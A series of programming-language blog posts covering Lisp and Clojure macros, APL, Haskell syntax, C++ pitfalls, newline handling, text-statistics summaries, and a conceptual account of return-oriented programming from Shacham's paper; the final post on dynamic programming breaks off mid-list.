Denotational semantics is hard

Conal Elliott's blog makes me feel stupid. This isn't a difficult feat; any math I don't understand will generally do the trick. But usually the feeling is misguided, because the problem is ignorance, not stupidity — when I don't understand something, it's probably because I don't know the concepts, not because I can't follow the reasoning.

Conal's blog is different. He builds everything out of simple concepts I already know, and explains his reasoning in painstaking, executable detail, and often I still don't get it. After reading a few such posts, I start to think I'm just too stupid to understand. Or, at least, that denotational semantics with partially defined values is hard enough that I can't wing it by knowing the basic concepts and figuring out the rest as I read. (When I put it that way, I don't feel so bad.)

I think part of the problem, beyond simple unfamiliarity, is that Conal's reasoning is mostly algebraic, and I'm not used to relying on that. Whenever I'm uncertain, I fall back on operational reasoning: I work through the computation and check that the results are what I expect. But this only works when I know what to expect. A typical Conal post is a tower of abstraction so high that when I try to check something, I'm not sure what the results ought to be. I have nothing to anchor my operational rope to, so when I lose my grip on the tower, I fall.

Fortunately, Edward Yang has come to the rescue with some helpful background posts on the very tools Conal uses. He walks the reader through explicit bottoms and the definedness partial ordering and fixpoints and lubs in great detail, with plenty of illustrated examples. (I like the hand-drawn diagrams. They look silly at first, but the absence of typesetting constraints probably allows them to be clearer than machine-drawn pictures would be.) It's all textbook material, and so detailed that it almost seems an insult to the reader's intelligence, but it's a textbook I haven't read, and apparently I deserve the insult. The detail provides valuable practice both at thinking in terms of these concepts and at algebraic reasoning about them, which is just what I needed. Some of Conal's posts are looking a little less mysterious now.

Macro of the day: build-list

Some operations are rare in “real” programs but common in throwaways and toys. One of these is creating lists of random data. Toy programs frequently use random input, simply because it's easier than getting real data. Usually this takes the form of evaluating some (random-thing) expression over and over and returning a list of the results:

(map (λ (x) (random-thing)) (range n))

The unused x here offends me. The randomly generated things usually don't depend on where they end up in the list, so why should the function that generates them receive the index as an argument?

I only find the unused argument annoying if it's in an explicit λ. Doing the same thing with Clojure's for doesn't feel nearly as sinful, since it doesn't explicitly say the index is being passed to a function:

(for [x (range n)] (random-thing))

That's acceptably simple. But what I really want to write is something like this:

(build-list n (random-thing))

...which evaluates (random-thing) n times and returns the results as a list. This is a straightforward macro:

(defmacro build-list
  "Return a seq of the results of evaluating EXPR N times."
  [n expr]
  `(for [i# (range ~n)] ~expr))

Or, in CL (which, even using loop, doesn't look good in comparison):

(defmacro build-list (n body)
  (with-gensyms (i)
    `(loop for ,i from 1 to ,n collect ,body)))

Clojure's built-in repeatedly is the functional equivalent of build-list: it's map over range, but without passing the argument. With # as a one-character λ, this approaches the ideal:

(repeatedly n #(random-thing))

These tools are simple and frequently useful, especially in the throwaway programs that most benefit from library support, but few standard libraries offer them. Some come close, but can't resist including the index as an argument. Racket, for instance, has a build-list function which is equivalent to map over a range, but it's barely an improvement for this use:

(build-list n (λ (x) (random-thing)))

I suspect this is because of cultural dissonance. Calling something repeatedly without passing it an argument is obviously useful only if it's not purely functional, and functional programmers tend to be suspicious of that. We (well, except for the Haskellers) accept impurities like randomness, but not so enthusiastically that we're comfortable including additional library functions to help with them. We expect our libraries to do the Right Thing, and some of our trusted heuristics tell us that making lists of random data is not the Right Thing. So, useful or not, we don't really try to make it easy.

What's so cool about APL?

Why does APL have such a devoted following, despite its strange appearance? What have its users, since the 1960s, seen in it that made them embrace such an unpopular language?

I'm not one of those fanatical APLers, but I think I understand why. Imagine the year is 1965. All computing is on mainframes, and the only high-level languages you've ever seen are Fortran and Algol-60. And then one day you meet APL, and discover:

  • It has a read-eval-print loop: you can type expressions in and see the results immediately, without running a compiler. It's a remarkably powerful calculator, in the days before calculators were common. (This may account for its popularity in finance.)
  • It's mostly functional: most operations return a result rather than requiring you to specify a destination to modify, so you can easily combine many operations in one expression.
  • It has built-in collections — specifically multidimensional arrays, but any decent collection support would do as well. We take collections for granted nowadays, at least in languages higher-level than C, but this wasn't always so. There's a reason many early languages (not just APL and Lisp) were built around a collection type.
  • It has high-order operations: map is (often) implicit, and reduce, scan, and Cartesian product are single characters.
  • It's terse, and not just because of its one-character names. You really can say in a line of APL what would take a page of Fortran.

Under these circumstances, wouldn't you be amazed by the powerful new language? Wouldn't you become a faithful user, and for decades wonder why all other languages were so uselessly primitive?

Complaining about defsystem

Xach wrote a tool to create boilerplate for ASDF projects. I winced to read this. It may be useful, sure, but it hurts to see “little projects” require three files and an ASDF registration.

I've never had the good fortune to work on a Common Lisp program large enough to need defsystem, and most other languages get by without it, so to me all this complexity looks not only unfamiliar but unnecessary. As a result, when I think about module systems and library loading and such, I tend to dismiss most of the potential features as esoteric. Separate compilation, compile-time circular dependencies, multiple versions, replaceable implementations, parameterised modules, analyzing dependencies without loading — these all seem less important than the mundane convenience of being able to write a library in a single file.

I suppose it's better to focus on problems I actually have than on ones I've only heard about. But I wonder which of the problems I'm ignoring are actually important.

The worst thing about viruses is...

Today I heard someone praising Linux as a desktop OS, on the grounds that it's not very susceptible to viruses. This, he said, was good because it “saves cycles” and cuts down on reinstalls.

Not because they're a security threat. That, apparently, was not on the radar.

I think the cycles he was talking about were those taken by antivirus software, not by the viruses themselves, but the point is clear: many users see viruses as an annoyance, not a threat. Performance and convenience — those are the things that matter.

The speaker was a programmer who is involved in designing network protocols. Maybe he was only giving the reasons he thought his audience would understand. I didn't ask; I'm afraid of what the answer would be.

Correct ≠ safe

I wrote, too optimistically:

It's easy to write correct string operations, even in C, even for null-terminated strings in fixed-size buffers — and security-conscious C programmers often do.

Barry Kelly objected:

I don't agree that it is easy [...] to write correct code in C for manipulating null-terminated strings in fixed sized buffers, for a simple reason: if you can't let the fixed length follow the string, either via static typing or dynamically, then normal procedural abstraction will tend to hide the length and lead to errors later.

I didn't find that very convincing until a few weeks ago, when I spent a late night tracking down a mysterious buffer overflow: I had used a “safe” string operation with the wrong buffer size.

Shame vs. helplessness

On Monday I got a bug report: I had broken something due to a stupid oversight. I felt ashamed.

On Tuesday I got another bug report: I had broken something else by making a deliberate change based on reasoning that was completely, obviously wrong. I felt even more ashamed.

On Wednesday I got a third bug report: some poorly factored code — not mine, for a change — had, unsurprisingly, turned out to have perverse error behaviour. Over the course of the day, one of its authors made a series of misguided attempts to fix it, introducing at least one new bug in the process. Watching, I felt even worse than I had about my own stupid mistakes.

Of course: this is an effect of (the illusion of) control. A problem is scarier and more frustrating when you don't feel you can do anything about it. I could imagine avoiding my own mistakes by being smarter or more careful or something, but I have no such illusions about my ability to prevent other people from making mistakes. So I feel helpless about them, and that's more unpleasant than feeling ashamed of my own stupidity.

(Both of my stupid mistakes, by the way, were in code I didn't want to write. It's easy to pay attention to code that does something you care about; it's harder when you don't actually want the functionality you're implementing.)

What? No composition?

I think of function composition as a basic operation, one used regularly in any functional language. But if it's really so common, how could I forget Common Lisp doesn't have it? It has identity and complement and plenty of high-order collection operations, so naturally one might expect it to have compose too. I assumed it did, and was recently surprised to hear otherwise. Evidently I've never tried to use it and found it missing.

This says something about how little high-order style is used in Common Lisp. With the annoyance of #', and no convenient partial application, and no lambdaless define in the function namespace, almost all functions are written with a (possibly implicit) lambda; uses of compose are not very common. Common Lisp may be more expressive than most languages, but it's still far from pseudocode.

Is infix lambda hard to read?

I've been using infix lambda in pseudocode for a couple of years, with mixed results. I find it very easy to write, because it's so terse, and I tend to use it for any one-argument function I can't get by partial application and simple combinators. But I find it surprisingly hard to read.

The symptom is that I mistake the parameter list for an expression. For example, in a definition like this...

gravitate bodies = map (b → accelerate b (field b bodies)) bodies

...I sometimes read the first b as a free variable, and spend a confused moment trying to figure out where it's bound, before I notice the operator and realize that I'm looking at the binding occurrence. This mistake is especially easy to make in larger definitions, where it's not obvious the b doesn't refer to some local variable I've forgotten about — and where it takes longer to see that no such variable exists.

I think the underlying problem is that the parameter list is the left argument of , so when I read an expression left-to-right, I encounter it before the operator. Since I haven't yet seen any hint that it's not an expression, I try to read it as one, and fail. Ordinary lambda, in constrast, announces its specialness first, so I'm not surprised by the parameter list.

If this really is the problem, then it should also affect other operators whose left arguments aren't expressions. But there aren't many. The only one I can think of is the ubiquitous (in my pseudocode, at least) infix define, =, which may be less confusing because it's used in distinctive contexts (at top level or in a progn). There are a few common operators whose right arguments are special (e.g. . for field access), but it seems few infix operators have left arguments that aren't expressions.

What do C♯ users (at least those few who use lambda much) think? Do you have trouble reading =>?

Function of the day: sum

Most folds are sums — either (fold + 0 ...) or (fold + 0 (map f ...)). In math and pseudocode, they're written as Σ or sum, not as folds. So programming languages should support writing them the same way. In Clojure:

(defn sum "Add the elements of a collection, or some function of them."
  ([xs] (reduce + xs))
  ([f xs] (reduce (fn [a x] (+ a (f x))) 0 xs)))

This is one of those trivial conveniences that I use with surprising frequency — more than many more familiar operations. Counts from a 286-line Clojure program:

CountOperation
11sum
11#(...) (op or abbreviated λ)
5format (I/O is everywhere)
4fn (λ)
4count
3map
3reduce (counting the two to implement sum)
2filter

sum may be trivial, but at least in this program, it's more common than map, reduce, and filter combined. Isn't that enough to deserve a place in the library?

(For performance reasons, Clojure's + isn't an ordinary generic function and thus can't be taught to work on vectors, so sum doesn't either. This program does vector arithmetic, so I had to duplicate various arithmetic operations for vectors, so three of these uses of sum were actually of a separate vsum. But this distinction would not be necessary in an ideal language.)

Pipe for functions

One of the minor annoyances of prefix notation for function call is that it gets the order of operations backwards. When you compose several functions into an expression, you generally have to write the last step first:

(handle-message (decrypt (receive socket) key))

If you explained this to a computer the same way you explain it to a human, you'd probably write the steps in the order they're performed. If you're used to Unix pipelines, you might write it like this:

receive socket | decrypt _ key | handle-message

In a language with user-defined infix operators, it's easy to support exactly this. You can define a | operator which simply applies its right argument to its left — the same as Haskell's $, but with the arguments reversed. It looks and feels very like the Unix |: it connects the output of one expression to the input of the next. The channels used are return value and arguments rather than stdout and stdin, but the effect is the same.

I can't remember where (edit 16 Feb 2011: here, at least, and also |> in F#), but I think I've heard this operator suggested before for Haskell — presumably with a different name, since | is taken. Ignoring that inconvenient detail, its Haskell definition is simple:

infixl 0 |
(|) :: a → (a → b) → b
x | f = f x
-- Or, to make the similarity to $ clearer:
(|) = flip ($)

Like $, this is a contemptibly trivial operator. All it does is apply one argument to the other, which doesn't sound like it could possibly be worth spending an infix operator on. But I find myself using it constantly in pseudocode, because it lets me write operations in the right order. It doesn't make code shorter, but it significantly reduces the distance between the code I write and the representation in my head. That's important enough to be worth a one-character infix operator.

Like any high-order operator, | is much more useful when you have a terse way to write simple functions. Usually this means partial application, either in the form of currying, or an explicit partial application operator, or op, or implicit op (as in the example above). Combinators are nice by themselves, but they need partial application to be really useful.

Shorter words for “expression”

Some common terms for programming languages vary widely in meaning, but at least one is understood across languages: virtually everyone agrees on “expression”.

Well, except in those communities that use the concept most. They have their own words for it. In Lisp, an expression is called a “form”; in the ML and statically-typed-functional-languages community, it's called a “term”. And let's not forget graph reduction, where it's called a “redex” (supposedly for “reducible expression”, although the “reducible” part is no longer relevant to the meaning). These terms all mean exactly the same thing, and all of the communities accept “expression” as a synonym, but they also have their own equivalents.

Private terms for common concepts usually exist to show group affiliation. That may be contributing here, but I think the main reason for replacing “expression” is brevity. It's difficult to write about programming languages (especially expression languages) without mentioning expressions exceedingly often, so there's a strong incentive to use a shorter word. “Expression” has three syllables and a difficult four-consonant cluster; “form” and “term” are easy one-syllable words. “Redex” is two syllables, which may explain why it's less popular than the other two.

None of the replacements are particularly transparent, but that doesn't matter much for such common words. (“Expression” doesn't make much sense either.) Apparently terms for such basic concepts needn't be obvious, as long as they're short.

Brevity may also be one of the reasons “thread” has largely replaced “process”. (The other reason is, of course, that popular OSes unify processes with other things like address spaces and security domains, and the word “process” has come to refer to the whole bundle rather than the original concept.)

Bursts of productivity are fun

I spent most of today slacking off at work, reading about astrophysics and paying only casual attention to actual work. But an hour or two past noon, a bug caught my eye — a simple mathematical matter of correctness, which I could feel good about fixing. It proved harder than I expected, and I soon filled a whiteboard with data structure diagrams and equations. After some frustration, I noticed other people leaving, and looked at a clock, which was obviously broken, since it said 5:00.

I turned back to the whiteboard, and saw that my previous approach was unnecessarily complicated. So I fixed that bug, and found another, and fixed it, and after fixing six bugs in a little over an hour, I lost interest and went back to reading.

Sound familiar? Most programmers (and most creative workers of any kind) are accustomed to seeing their productivity vary wildly over time. On one day you get nothing done and feel guilty for not trying very hard; the next day is the same except for a brief burst in which you seemingly do a week's work in two hours. The Internet is full of programmers lamenting this situation, and wishing they could have these bursts every day.

I suspect this unwelcome variation accounts for part of the fun of programming. The periods of apathy and frustration lower your expectations, so when the bursts of activity arrive, they seem far beyond your normal ability — a contrast that can make even the most boring problems exiting. I noticed this effect today: that one hour when everything went right, and everything worked on the first try, would not have been so impressive if it hadn't been preceded by a few hours of frustration. If you were modestly productive all the time, you might get the same total work done, but it would be more predictable, and you would have fewer moments of unexpected triumph. Mightn't that be less fun?

Exception logic

Programming generally requires Boolean logic, so every practical language supports it with if, and, not, and other such operators. In almost all languages, these operators receive their Boolean inputs as ordinary values. (if (and a b) c d) evaluates a, and the resulting value determines whether to evaluate b, and so on. This is all so obvious and familiar that it's hard to imagine it could be otherwise.

Icon does it differently. Icon expressions (and functions) have two continuations: they can succeed and produce a value, just like expressions in a thousand other languages, or they can fail. This feature has many uses, and one of them is to represent Booleans: Icon encodes them not in values but in success or failure. Its if operator doesn't look at the value returned by the conditional expression — it only looks at whether it succeeds or fails. Similarly, its or operator (called |) evaluates its second argument only if the first fails. In Icon, Booleans aren't values.

Few languages have Icon's success/failure semantics, but it doesn't take exotic semantics to encode Booleans this way. Any language with exceptions can do something similar: returning normally means true, and throwing an exception means false. Most languages with good support for exceptions use them extensively in their standard libraries, so functions that return exception Booleans are already common.

It's not often recognized, though, that one can define operators on these Booleans. I briefly thought Perl 6 did, based on a misunderstanding of its andthen and orelse operators, but it turns out they operate on defined vs. undefined values, not exceptions. (Perl, true to form, has several ways to represent booleans, one of which is defined/undefined.) However, there are a few exception-Boolean operators in existing languages, even if they're not usually described that way:

  • Ordinary progn/begin is the exception equivalent of and: it evaluates each subform only if the previous ones returned normally.
  • Many languages have an (assert expression) operator, which converts a value Boolean into a exception Boolean.
  • Common Lisp's (ignore-errors expression t) converts an exception Boolean into a value Boolean, returning nil on error and t otherwise. (However, it only handles errors, not all serious-conditions.)
  • Some test frameworks have a (must-fail expression) form, which throws an exception iff the expression doesn't. This is the exception-Boolean equivalent of not.

Given macros and an exception-handling construct, you can easily build others, such as or and if:

(defmacro succeeds (form)
  "Convert an exception Boolean to a value Boolean: return
true if this form returns normally, or false if it signals a
SERIOUS-CONDITION."
  `(handler-case (progn ,form t)
     (serious-condition () nil)))

(defmacro eif (test then &optional else)
  "Exception IF: THEN if TEST returns normally, otherwise ELSE."
  `(if (succeeds ,test)
     ,then
     ,else))

(defmacro eor (&rest forms)
  "Like OR, but treating normal return as true and
SERIOUS-CONDITION as false. Perhaps surprisingly, (EOR)
signals an exception, since that's its identity."
  (cond ((null forms) `(error "No alternatives in EOR."))
 ((null (cdr forms)) (car forms))
 (t `(handler-case ,(car forms)
       (serious-condition () (eor ,@(cdr forms)))))))

These operators may be a fun exercise, but are they of any practical use?

There is a tension in the design of functions that might fail in normal operation — those that depend on the cooperation of the environment, like opening a file or making a TCP connection, and even those that return something that may or may not exist, like hashtable lookup. Such functions face an awkward choice between indicating failure by their return value (e.g. returning nil, or a Maybe) or throwing an exception. A special return value is most convenient for callers who want to handle failure, because they can easily detect it with ordinary operators. But it often forces those who can't handle the failure to explicitly check for it anyway. An exception, on the other hand, is perfect for callers who can't handle failure and just want it to propagate up automatically, but awkward for those who can handle it, since in most languages it's much easier to check for nil than to catch an exception. So functions are forced to choose how they report failure based on guesses about how often their callers will want to handle it.

Exception logic might ameliorate this. If you can handle exceptions as easily as return values, then exceptions are no longer at an expressive disadvantage. This means you can use them more consistently: virtually any function that might fail can indicate it with an exception — even the commonly tentative ones like dictionary lookup. So exception operators are interesting not for their own sake, but because they may allow other parts of a language to be more consistent.

Like all error handling features, this is hard to experiment with in pseudocode, because it's so easy to ignore error behaviour. It's also hard to experiment with in a real language, because its value depends on changing so many library functions. So I wouldn't be surprised if I've overlooked some common case where exceptions are still inconvenient. But this sort of thing is worth looking into, because it could make libraries simpler and more consistent.

Haskell and syntactic complexity

Why isn't if a function in Haskell?

In most languages, if is a special form (or local equivalent). That's because if is lazy in its last two arguments, so it can't be a function in an eager language. But Haskell has no trouble with laziness; if can trivially be a function, with no need for special semantics, let alone syntax. There's even a page on the Haskell Wiki advocating switching to the simple functional if.

All this must have been obvious to the designers of Haskell. So why did they choose the Algolesque if ... then ... else ... syntax instead?

Of course this question has come up before. Paul Hudak, one of the designers, explains:

Dan Doel's answer is closest to the truth:
I imagine the answer is that having the syntax for it looks nicer/is clearer. "if a b c" could be more cryptic than "if a then b else c" for some values of a, b and c.

except that there was also the simple desire to conform to convention here (I don't recall fewer parentheses being a reason for the choice). In considering the alternative, I remember the function "cond" being proposed instead of "if", in deference to Scheme and to avoid confusion with people's expectations regarding "if".

To my eye, if a then b else c improves neither clarity nor familiarity, but evidently the Haskell designers thought otherwise. More interestingly, they didn't think the added syntactic complexity was much of a problem. How can this be? Doesn't Haskell culture value simplicity?

Yes, but not so much simplicity of syntax. I'm misled here by a superficial resemblance between the cultures of Haskell and Lisp. Both cultures are obsessed with mechanically processing code, and therefore want the language core to be as simple as possible. Since a minimal core is impractical to program in, both expect a larger, more useful language to be defined by translation to the core, so its complexity can be mechanically eliminated. And both consider the representation of code as text to be separate, at least in principle, from the core. So at first glance, it seems as if they should have the same attitude to syntactic complexity.

But they treat it quite differently. Lisp's culture considers syntax unimportant, and therefore tries to make it as simple and transparent as possible, so it won't prevent humans from seeing through it — because code is much more interesting than its textual representation. But Haskell's culture considers syntax safely separate from the language core, and is therefore willing to tolerate complexity in it. Since it goes away without inflicting any complexity on the core, why shouldn't it include whatever features are convenient?

This approach has given Haskell one of the prettiest syntaxes in the world, so I can't say it's wrong. It is uncomfortable, though, for a Lisper to see a culture which draws wildly different conclusions from seemingly similar premises. Maybe this is explained by modest differences in degree: Haskell values textual beauty a bit more than Lisp, and code-processing a bit less. Is that enough to explain the difference? I don't know. I don't understand.

From Python to C++

A few days months ago someone asked me (well, a group that happened to include me) for advice on learning C++, for a Python speaker.

Ouch. What do you tell someone who's getting started with C++? What can you say that won't scare them away?

You could tell them the good reason behind many of C++'s complexities: that it's lower-level than Python, especially in data representation. You could tell them that's good when you care about efficiency and bad the rest of the time. But they probably already know that, and it's not the most useful sort of information.

You could give them bits of good advice, and warn them of the dangers. There are hundreds of specific tips and tricks they'll need to learn, but they wouldn't understand most of them until they knew more of the language. Failing that, you could at least give them some general warnings:

  • There is much less agreement on good style. There are often multiple incompatible accepted ways to do something, like, say, basic I/O. Some of the advanced features are painful to the point of uselessness.
  • Parts of the standard library are dangerously broken.
  • For reasons of backward-compatibility and low-level-ness, C++ is complicated. Don't expect to keep the whole language in your head, the way you can for Python.
  • Collection support is pretty bad.
  • There is a way to do anything, but it may be more trouble than it's worth.
  • A lot of C++ tutorial material appears to be written for and by idiots.
  • Manual memory management is hard. If it accounts for half of your bugs, that's normal.

But they'd forget all that before they learned enough to apply it. Is there a shorter summary of the differences between C++ and Python?

I'd put it this way: you can't trust C++. Python may have a few warts, but for the most part it makes sense, because someone designed it. Most features are there for a good reason, and the obvious way to do things is generally the right way. The language is a garden, planted with useful things, and its pathways are generally safe and will lead you somewhere useful.

C++, on the other hand, is a wilderness. It may have almost as many fruits and flowers as the garden, but they're hidden among poisonous plants and thorns, and guarded by poisonous snakes and tigers. There are paths, but they're hard to follow, and some of them lead off cliffs or into swamps or snares. To navigate C++, you must be your own guide, because the language won't help you.

I don't hate C++. I admire the degree to which it can support higher-level constructs without losing its low-level powers. But it's a hard language to introduce someone to, especially someone who's coming from Python and therefore expects languages to make sense.

Why the imperative examples?

Speaking of example programs: why are so many examples stateful? Wherever algorithms are explained — in textbooks, in academic papers, in websites formal and otherwise — the style of choice is overwhelmingly imperative. Assignment is everywhere; simple maps and folds are written as explicit iteration; data structures are updated destructively for no reason; even recursion is often expressed by loops and state. This is true even in pseudocode, where there's no practical reason not to write functionally. This annoys me. Why can't we write our examples clearly?

Some of this must be simply the inertia of formality. Imperative style used to be the only well-known option, so it's traditional, and when people try to look authoritative by imitating older authorities, they tend to copy their style, even if they wouldn't normally write that way. This happens for writing style, so why shouldn't it happen for programming style too?

Didactic examples also have a good reason to be conservative in the language they use: they're explaining something to someone who doesn't already know it, and may be ignorant of other concepts as well. State and iteration are familiar even to nonprogrammers, while many of the concepts of functional programming are not very widely known even among programmers. So maybe the imperative examples are comprehensible to a larger audience?

And maybe there's a cultural gap: if the people who study (and explain) algorithms have little overlap with those who study how to express them, they may simply be unaccustomed to functional style, and prefer something more familiar. But it seems to me I've seen oddly imperative examples even from people who know better and would never write “real” code that way.

I also suspect that state, especially in small programs, isn't as confusing as we like to think. Little examples don't have the maintenance and modularity problems that large programs do, so maybe state isn't much of a problem for them, and there's not much pressure to write more functionally.

But it still irks me. Is the state of the art, in 2010, to describe algorithms in terms of assignment? Must we communicate new ideas by implementations we would consider unreadable in any other context?

I know there are some people who explain algorithms with functional examples, especially in the Haskell community. But why isn't this the norm?

Expressiveness isn't always good for examples

One of the most common ways to learn a new concept is by reading an example implementation. I expect that most programmers, given a choice, prefer to see the example in as high-level a language as possible, to minimize the amount of irrelevant detail they have to ignore. I do, anyway... don't I?

Recently I saw an unfamiliar statistics algorithm illustrated in C++ — in particular, in a very basic subset of C++, with one class and no pointers or templates. To my surprise, I found that reassuring. The use of an unexpressive language made it obvious that there was nothing fancy going on — no fancy control flow, no infinite data structures, no high-order functions, no polymorphism. C++ has many potentially confusing features (e.g. templates, overloading), but in a one-page example, it was easy to see that none of them were used. It was also obvious that the algorithm didn't depend on any exotic language features like lambda or laziness or bignums or garbage collection, so I could easily use it in any language.

A more powerful language might have expressed the example in less code, but not a lot less — it was largely arithmetic, which C++ is not bad at. And in a more powerful language, even a smaller amount of code might have expressed many more plausible things. The choice of an obviously unexpressive language ruled out large classes of things the example wasn't doing, allowing me to more quickly understand it without getting lost in a large space of possibilities.

On the other hand, I have already forgotten the algorithm, so maybe I didn't understand it very well after all.

Java gets newline handling right

The platform-dependent representation of newlines (as CR, LF, or CR+LF) is a surprisingly persistent annoyance. In theory, this problem was solved decades ago, when I/O libraries began to automatically convert from the host platform's newline convention to a portable in-memory representation. But in practice, files are routinely shared across platforms without being converted along the way, so a file may contain any of the three newline sequences, or even a mixture of them. (No, really, I've run into this repeatedly.) Knowing the host platform's newline convention doesn't help when the data doesn't follow it.

The obvious solution is to recognize all three newline endings, and treat them all identically. Unfortunately this creates ambiguity: a character such as CR might be a newline, or it might by a carriage return that occurs in the middle of a line, and the two will read identically. This means attempting to copy a file by reading and writing lines won't always preserve the original file. But this isn't a problem for most programs, because those that read lines of text generally only want input that makes sense as text, and that doesn't include arbitrary control characters. (Compare to C's restriction on the null character: it's valid but rarely plausible, so the restriction is not usually a problem.) As long as there are other operations for reading data in its raw form without interpreting it as text, the operation for reading lines need not distinguish between newline conventions.

It's also convenient to do newline conversion in the read-line operation, not as a feature of the underlying stream. This makes it easy to reversibly read text with control characters, and also makes it easier to mix text and other data in one stream. As a bonus, it eliminates the need to specify text or binary mode when opening a file.

My brilliant ideas have, of course, already occurred to someone else, and been implemented in a popular language: Java. From the documentation for java.io.BufferedReader:

public String readLine()
                throws IOException

Reads a line of text. A line is considered to be terminated by any one of a line feed ('\n'), a carriage return ('\r'), or a carriage return followed immediately by a linefeed.

Returns:
A String containing the contents of the line, not including any line-termination characters, or null if the end of the stream has been reached

Wrapping a stream in a BufferedReader is awkward, but readLine does exactly what I want. Not even Perl solves this text processing problem so conveniently! Java is not rich in such conveniences, so I was surprised to discover that it has this one. It may be motivated by portability: Java wants programs to behave identically on all platforms, and platform-dependent newline handling violates that.

C# (or rather .NET) follows Java here. So, presumably, do most JVM and .NET languages. I suspect there are others that have either borrowed this feature or invented it independently. Which ones?

Update April 2014: Python calls this “universal newlines”, and has had it since 2003.

(It would be nice to detect text encodings the same way, since many streams have unknown or mislabeled encodings. Unfortunately, there are byte sequences that are not only possible but plausible in more than one encoding, so there is no solution reliable enough to be the default.)

Text statistics as summaries

Darius Bacon mechanically summarizes the Lord of the Rings by determining the most anomalously frequent words in each chapter. The word lists are surprisingly evocative. It's obvious which chapter this is, for instance:

Gorbag Shelob Lugbúrz Shagrat Ladyship Ya hoi belly

Or this:

Parth Galen Rauros glade cloven boat fate bearer

Even those word lists that don't include important names or events are still recognizable. I would not expect to recognize this, but I do:

quality Númenóreans Damrod mistress squirrel wiser arts Mablung

Word frequency is sensitive to repetitive text, such as the songs Tolkien is so fond of. This can be a problem. This chapter, for instance, is less obvious:

fiddle inn cow local Mugwort diddle tray comer

Or this one, which is dominated by characters who aren't even in the story:

Tinúviel Beren Thingol Bob Lúthien hemlock midges Gil

But most stories don't include many songs or poems. (Whether this is a bad thing depends on how good you expect the marginal poem to be.)

This could be a great way to generate tables of contents. It's much more flexible than hand-written chapter titles, since it works on arbitrary chunks of text. Instead of summarizing only the chunks someone thought to write titles for, you could summarize arbitrary levels of coarseness: hundred-page chunks for a high-level TOC, and smaller ones as you zoom in on a specific section. It could also be helpful for navigating large files: when you're looking for a certain part of a file but don't have a good search term, it might be faster to read through an automatic summary than to manually skim through the text.

Darius' post includes code, so you can see how it works, and try it yourself.

Strings and lines

I was recently surprised by the behavior of the . regex operator in Perl: it matches any character except newline. This seems like the sort of thing I should have already known. It's right there in the documentation. But if I ever knew it, I've forgotten, which suggests I've never tried to match a regex against a multiline string.

Well, of course. How often do you do anything to strings containing newlines, except for printing them out intact?

For that matter, how often do you have such strings at all? Most strings, after all, are either 1) lines of files, which by definition don't contain newlines, or 2) names of some sort, which usually can't contain control characters of any kind. (Yes, filenames can theoretically contain control characters. But have you ever seen one, except for the time you created one to see if it worked?) Even strings that could in principle contain newlines, such as error messages, usually don't, because the possibility doesn't occur to programmers. Control characters aren't real characters, are they?

And, of course, many languages don't allow newlines in string literals. In those that do, they're rarely used.

It seems to me that I (and most programmers, probably) overgeneralize from this: I think of newlines, like nulls and other control characters, as not generally being valid in strings. Consciously, I know strings can contain arbitrary characters, but unconsciously, I think a string must be one line.

The inevitable interpreter

This must be the cutest code injection method ever. Hovav Shacham's paper The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) describes yet another method of injecting code into a process by clobbering its stack. The cute part isn't the title (although it did tempt me to read the paper). The cute part is that this method uses a Turing-complete language for which an interpreter already exists by accident.

It's a generalization of a well-known method called return-into-libc: if you can overwrite a function's return address, you can turn its return into a call to some existing function, such as one from a common library like libc. If you can arrange for the return address of that call to be another library function, you can call a series of them: it's threaded code, expressed through return addresses. This lets you run code of your choosing without injecting any machine code of your own, so it works even if you don't have write access to any executable memory.

But it's limited in its expressiveness, because it only calls the functions provided by the target library, and those usually don't form a complete basis for computation. The available libraries don't generally include functions for branching, looping, moving data around, and the other trivial operations that enable computation. (Languages whose standard libraries contain lots of high-order functions may be more vulnerable in this respect, but since they're not so widely used and most of them are memory-safe, they aren't very attractive attack targets.) Return-into-libc exploits an accidental threaded-code interpreter, but not a very flexible one: it can call arbitrary functions, but it can't compute much.

This paper removes this limitation by showing that the provided functions are not the only possible targets for return-into-libc. Any sequence of instructions ending in a ret can in principle be called as a function, and such sequences are common — they occur at every return site of every function! Furthermore, many such sequences perform useful operations such as arithmetic, conditionals, moves, and looping. These are the missing primitives needed to make return-into-libc Turing-complete. The necessary sequences occur quite frequently in real code, so any substantial x86 library contains a Turing-complete threaded-code interpreter.

The paper also argues that it's difficult for any x86 library to avoid accidentally providing such an interpreter. The architecture goes out of its way to provide convenient instructions for common operations, and to give the common instructions short representations. In particular it provides function return, the crucial operation for this attack, as the convenient one-byte ret instruction. Many other useful instructions are also only one or two bytes, so useful sequences can be quite short. This means they occur not only at intended return sites but as frame shifts inside other instructions, and even in literal constants. So even if a compiler carefully arranged for all return sites to be useless for return-into-libc purposes, the necessary sequences would still appear elsewhere. On x86, it's hard to avoid making the return-into-libc language Turing-complete.

It's not hard to make a Turing-complete language. Many language implementors have done so by accident, when they took languages not intended as programming languages and added convenient features like functions without realizing the implications. Many absurdly simple mathematical systems are also Turing-complete, including ones that don't look like languages, such as Fractran and Rule 110 and Conway's Game of Life. But this is the first case I've heard of where a Turing-complete language exists in the wild, without anyone intending to implement anything like an interpreter at all, as an inevitable consequence of a machine's architecture.

(Via Z-Bo on LtU. This is old news, but I hadn't heard of it, so maybe you haven't either.)

Thou art thyself, though not a Scheme

Is there any part of a language so obviously unimportant as its name? PLT Scheme was recently renamed to Racket, but it's just a name change; the language is the same as before (or at least isn't changing faster than usual). I was rather surprised to hear of this (I fleetingly thought it was April) since the old name is so well known, but apparently the PLTers think their language will be better off if it's not associated with other Schemes. Anyway, the change shouldn't affect anyone who knows, right?

But it does affect me. Yesterday I was lamenting how little of Scheme is portable across implementations, and found myself thinking, “wait, that doesn't apply to PLT Scheme any more, because it's Racket now”. Even though I know there's no difference, I tend to see PLT Scheme as a Scheme with nonportable extensions, and Racket as an independent language. The new name is working: it makes me take Racket more seriously as a platform, not just an implementation.

(However, I keep mistaking it for “Rocket”.)

“Dynamic programming” obscures a simple concept

I'm surprised at how many commenters on my previous post (here and at Reddit and HN) think it's a mistake to identify dynamic programming with memoization. I thought this was uncontroversial: that the central idea of DP is simply to make naive recursive algorithms efficient by memoizing. Evidently a lot of readers think otherwise.

I think they've been misled by the traditional presentation of DP, which bundles a lot of optimizations with that central idea. The recipe usually goes something like this:

  1. Generate a naive recursive algorithm.
  2. Memoize it by saving partial results in an array.
  3. Invert control, so the table of results is explicity assembled bottom-up instead of as a byproduct of top-down recursion.
  4. Analyze the dependencies among the partial results, and if possible, simplify the saved results to avoid storing unnecessary data.

